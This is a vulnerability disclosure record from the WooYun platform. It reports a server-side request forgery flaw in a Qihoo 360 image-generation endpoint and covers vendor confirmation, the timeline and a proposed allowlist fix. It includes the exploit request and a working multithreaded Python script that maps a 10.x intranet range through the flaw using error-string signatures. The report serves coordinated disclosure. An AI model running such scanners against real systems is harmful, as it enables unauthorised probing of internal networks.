
Probing 360's intranet again through an SSRF (verification script attached)

ID: 90257
URL: http://www.wooyun.org/bug.php?action=view&id=90257
Status: confirmed by vendor
Title: Probing 360's intranet again through an SSRF (verification script attached)
Type: design flaw / logic error
Vendor: Qihoo 360
Reporter (white hat): lijiejie
Submitted: 2015-01-06 14:42:00
Disclosed: 2015-02-20 14:44:00
Fixed: (not set)
Confirmed: 2015-01-06 00:00:00
Confirm Spend: 0
Tags: (none)
Followers: 0
Bookmarks: 0
Reporter rating: self-assessed Rank 6
Vendor rating: Rank 7

Summary
Probing 360's intranet again through an SSRF (verification script attached)

Details

The SSRF is located at:

POST http://wasai.360.cn/gen_inform.php
city=http://10.108.79.189:80/&imgurl=&name=e&time=2015-1-6&weibo=1


The server-side script issues an HTTP request to whatever target is given in the city and imgurl parameters, so it can be used to probe 360's intranet.
If the target does not run an HTTP service, the response carries this signature string:

13:32:34 <glueImage img error:http_code:0 content_length:-1 image_length:0>


If the port does run an HTTP service, one of three responses comes back:
1) The image was generated successfully

{"s":true,"m":"ok","d":"http:\/\/p1.qhimg.com\/t011db843f5245a2050.jpg"}


2) The target returned a non-200 status code

<glueImage img error:http_code:404 content_length:202 image_length:202>


3) The target returned 200, but the body is not a valid image

<glueImage img error:UnableToOpenFile `/tmp/magick-6713FEEry8oqbqOu': No such file or directory @ error/constitute.c/ReadImage/594>

PoC

Test scan of the 10.108.79.* /24 range:

[Screenshot: 360_ssrf_2.png, scanner output]




Verification script, for reference:

#encoding=gbk
import httplib
import threading
import Queue
import json
import sys
import re

lock = threading.Lock()
queue = Queue.Queue()
headers = {'Content-Type': 'application/x-www-form-urlencoded'}


def scan_http_service():
    while True:
        try:
            item = queue.get(timeout=1.0)
        except Queue.Empty:  # queue drained, this worker is finished
            break

        try:
            conn = httplib.HTTPConnection('wasai.360.cn', timeout=3)
            url = 'http://%s:%s/' % (item['ip'], item['port'])
            # gen_inform.php fetches whatever URL is passed in "city"
            conn.request(method='POST',
                         url='/gen_inform.php',
                         body='city=%s&imgurl=&name=e&time=2015-1-6&weibo=1' % url,
                         headers=headers)
            html_doc = conn.getresponse().read()
            conn.close()
            if html_doc.find('http_code:0 content_length:-1') >= 0:  # no HTTP service
                continue

            if html_doc.find('img error:UnableToOpenFile') > 0:  # 200, but not an image
                lock.acquire()
                sys.stdout.write('[OK]%s\t=>\t200 (Not an Image)\n' % url)
                lock.release()
                continue

            if html_doc.find('http_code:') > 0:  # non-200 status from the target
                s = re.search(r'http_code:\d+ content_length:\d+', html_doc).group(0)
                lock.acquire()
                sys.stdout.write('[OK]%s\t=>\t%s\n' % (url, s))
                lock.release()
                continue

            # image generated: the target answered 200 with a real image
            json_doc = json.loads(html_doc)
            if json_doc['s'] is True:
                lock.acquire()
                sys.stdout.write('[OK]%s\t=>\t200\n' % url)
                lock.release()

        except Exception:
            pass


for port in [80, 8080, 8888, 8360]:
    for i in range(1, 256):
        queue.put({'ip': '10.108.79.%s' % i, 'port': port})

threads = []
for i in range(10):
    t = threading.Thread(target=scan_http_service)
    t.start()
    threads.append(t)
for t in threads:
    t.join()

print 'All Done'

Fix recommendation

Recommend restricting the target domain.
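As an added example, not part of the original report or of 360's code, this is the recommended fix, restricting the target domain, written as an allowlist check on the URL that would be passed in city or imgurl: scheme, host, port and every resolved address are checked before any server-side fetch. ALLOWED_HOSTS and img.example.com are placeholders, and the resolver argument exists only so the check can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical allowlist (placeholder values, not from the report): the only hosts
# and ports the image-generation back end is permitted to fetch from.
ALLOWED_HOSTS = {"img.example.com"}
ALLOWED_PORTS = {80, 443}


def _is_public(ip):
    """True only for globally routable unicast addresses (rejects 10/8, 127/8, ...)."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_fetch_url(url, resolver=socket.getaddrinfo):
    """Decide whether a user-supplied URL may be fetched server-side.

    Returns (ok, reason, ip). The resolver is injectable so the check can be
    tested offline; the caller should connect to the returned ip rather than
    re-resolving the name, so a rebinding DNS record cannot change the target.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed", None
    try:
        host, port = parts.hostname, parts.port
    except ValueError:                      # non-numeric or out-of-range port
        return False, "malformed authority", None
    if not host or parts.username or parts.password:
        return False, "malformed authority", None
    if host not in ALLOWED_HOSTS:           # hostname is already lower-cased
        return False, "host not in allowlist", None
    port = port or (443 if parts.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        return False, "port not allowed", None
    try:
        infos = resolver(host, port, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return False, "dns failure", None
    ips = {info[4][0] for info in infos}
    # Every resolved address must be public: an allowlisted name that points at
    # an internal address (misconfiguration or rebinding) is still refused.
    if not ips or not all(_is_public(ip) for ip in ips):
        return False, "resolves to non-public address", None
    return True, "ok", sorted(ips)[0]
```

With this check in front of the fetch, the intranet URL from the PoC is rejected before any connection is made, and the error-string oracle the report relies on is never reached.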

Status history
2015-01-06: Details sent to the vendor, awaiting vendor handling
2015-01-06: Vendor confirmed; details disclosed to the vendor only
2015-01-16: Details disclosed to core white hats and domain experts
2015-01-26: Details disclosed to regular white hats
2015-02-05: Details disclosed to intern white hats
2015-02-20: Details disclosed to the public
Vendor response: Thank you for the report; the affected service has been fixed.
Response info: Severity: Medium; Vulnerability Rank: 7; Confirmed: 2015-01-06 15:31
Comments (6)
Comment | Commenter | Likes | Time
.......... | Power | 0 | 2015-01-06 16:03:00
test | bey0nd | 0 | 2015-01-06 15:30:00
Farming bugs, huh... you sure submit a lot. | 岩少 | 0 | 2015-01-06 15:02:00
Feels like this one will get ignored | 帅气小狼狗 | 0 | 2015-01-06 15:00:00
Awesome! | px1624 | 0 | 2015-01-06 14:48:00
mark | 茜茜公主 | 0 | 2015-01-06 14:44:00